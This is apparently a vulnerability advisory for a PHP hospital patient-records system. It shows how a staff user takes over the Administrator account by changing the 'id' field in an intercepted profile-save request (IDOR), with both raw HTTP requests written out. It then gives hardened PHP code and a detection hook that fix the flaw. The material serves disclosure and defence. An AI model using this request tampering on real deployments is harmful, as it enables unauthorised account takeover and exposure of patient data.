# Exploit Title: Hospitals Patient Records Management System 1.0 - Account TakeOver
# Date: 30/12/2021
# Exploit Author: twseptian
# Vendor Homepage: https://www.sourcecodester.com/php/15116/hospitals-patient-records-management-system-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/hprms_0.zip
# Version: v1.0
# Tested on: Kali Linux 2021.4

*Insecure direct object references (IDOR)*

Insecure Direct Object References (IDOR) occur when an application provides direct access to objects based on user-supplied input. IDOR allows attackers to bypass authorization and access resources directly by modifying the value of a parameter that points straight at an object. Such resources can be database entries belonging to other users or files on the system.

*Attack Vector*

An attacker can take over the Administrator's account.

*Steps to reproduce:*

Note: in this case we used two users: user1, a staff member with user id '4', and admin, an Administrator with user id '1'.
=====================================================================================================================================
Step-1: Log in to the application using the user1 account, then on the dashboard navigate to 'My Account':

http://localhost/hprms/admin/?page=user

=====================================================================================================================================
Step-2: Modify the username, lastname and password, then intercept the request using Burp Suite:

POST /hprms/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------17632878732301879013646251239
Content-Length: 806
Origin: http://localhost
Connection: close
Referer: http://localhost/hprms/admin/?page=user
Cookie: PHPSESSID=32kl57ct3p8nsicsrp8dte2c50
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------17632878732301879013646251239
Content-Disposition: form-data; name="id"

4
-----------------------------17632878732301879013646251239
Content-Disposition: form-data; name="firstname"

user1
-----------------------------17632878732301879013646251239
Content-Disposition: form-data; name="lastname"

admin
-----------------------------17632878732301879013646251239
Content-Disposition: form-data; name="username"

admin1
-----------------------------17632878732301879013646251239
Content-Disposition: form-data; name="password"

admin1
-----------------------------17632878732301879013646251239
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream


-----------------------------17632878732301879013646251239--

=====================================================================================================================================
Step-3: Change the parameter id from '4' to '1':

POST /hprms/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------17632878732301879013646251239
Content-Length: 806
Origin: http://localhost
Connection: close
Referer: http://localhost/hprms/admin/?page=user
Cookie: PHPSESSID=32kl57ct3p8nsicsrp8dte2c50
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------17632878732301879013646251239
Content-Disposition: form-data; name="id"

1
-----------------------------17632878732301879013646251239
Content-Disposition: form-data; name="firstname"

user1
-----------------------------17632878732301879013646251239
Content-Disposition: form-data; name="lastname"

admin
-----------------------------17632878732301879013646251239
Content-Disposition: form-data; name="username"

admin1
-----------------------------17632878732301879013646251239
Content-Disposition: form-data; name="password"

admin1
-----------------------------17632878732301879013646251239
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream


-----------------------------17632878732301879013646251239--

=====================================================================================================================================
Step-4: Click 'Forward' in Burp Suite. Now user1 is an Administrator.
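The root cause behind Step-3 is that the save handler trusts the client-supplied "id" field to pick the row it updates. The following PHP is an added illustration written for this page, not code from the HPRMS project: it places the vulnerable pattern beside a hardened one in which the target row is derived from the server-side session, and only an administrator may name a different account. The session keys (login_id, login_type), the numeric role values and the callable used in place of the real database update are all assumptions; the advisory itself only tells us the form field is called "id" and that staff and Administrator accounts exist.

```php
<?php
declare(strict_types=1);

// Added example for this advisory, not the project's own code.
// Assumed session layout: $_SESSION['login_id'] (user id) and
// $_SESSION['login_type'] (1 = Administrator, 2 = Staff).
const TYPE_ADMIN = 1;
const TYPE_STAFF = 2;

// Vulnerable pattern: whatever "id" the client posts is the row that is
// updated. A staff user posting id=1 overwrites the Administrator's
// username and password, exactly as in Step-3 above.
function target_id_vulnerable(array $session, array $post): int
{
    return (int) $post['id'];
}

// Hardened pattern: the row to update comes from the session. A posted
// "id" is honoured only when it is the caller's own id, or when the
// caller is an Administrator managing another account.
function target_id_hardened(array $session, array $post): ?int
{
    if (!isset($session['login_id'], $session['login_type'])) {
        return null; // not authenticated
    }
    $self      = (int) $session['login_id'];
    $requested = isset($post['id']) ? (int) $post['id'] : $self;

    if ($requested === $self) {
        return $self; // editing your own profile is always allowed
    }
    if ((int) $session['login_type'] === TYPE_ADMIN) {
        return $requested; // administrators may edit other accounts
    }
    // Worth logging: a non-admin naming someone else's id is the IDOR signature.
    error_log(sprintf('IDOR attempt: user %d tried to update user %d', $self, $requested));
    return null;
}

// How the hardened check slots into the save handler. $update stands in
// for the real database write (hypothetical signature: id, username, hash).
function save_user(array $session, array $post, callable $update): bool
{
    $id = target_id_hardened($session, $post);
    if ($id === null) {
        http_response_code(403);
        return false;
    }
    // Store a proper password hash rather than the plaintext from the form.
    return (bool) $update($id, $post['username'], password_hash($post['password'], PASSWORD_DEFAULT));
}

// Replay of the advisory's scenario: staff user 4 submits id=1 (constructed input).
$staffSession = ['login_id' => 4, 'login_type' => TYPE_STAFF];
$adminSession = ['login_id' => 1, 'login_type' => TYPE_ADMIN];
$tampered     = ['id' => '1', 'username' => 'admin1', 'password' => 'admin1'];
$ownProfile   = ['id' => '4', 'username' => 'user1', 'password' => 'newpass'];

assert(target_id_vulnerable($staffSession, $tampered) === 1);   // admin row gets overwritten
assert(target_id_hardened($staffSession, $tampered) === null);  // refused
assert(target_id_hardened($staffSession, $ownProfile) === 4);   // own account still editable
assert(target_id_hardened($adminSession, $tampered) === 1);     // admin may manage user 1

$written = [];
$ok = save_user($staffSession, $tampered, function (int $id, string $u, string $h) use (&$written): bool {
    $written[] = $id;
    return true;
});
assert($ok === false && $written === []); // nothing reached the database
```

The same rule applies to every other object-bearing parameter in the application: look up the object the session owns, then compare the requested identifier against it, rather than passing the request value into the WHERE clause. The error_log line also gives a detection hook, since a legitimate staff user never produces a request whose "id" differs from their session id.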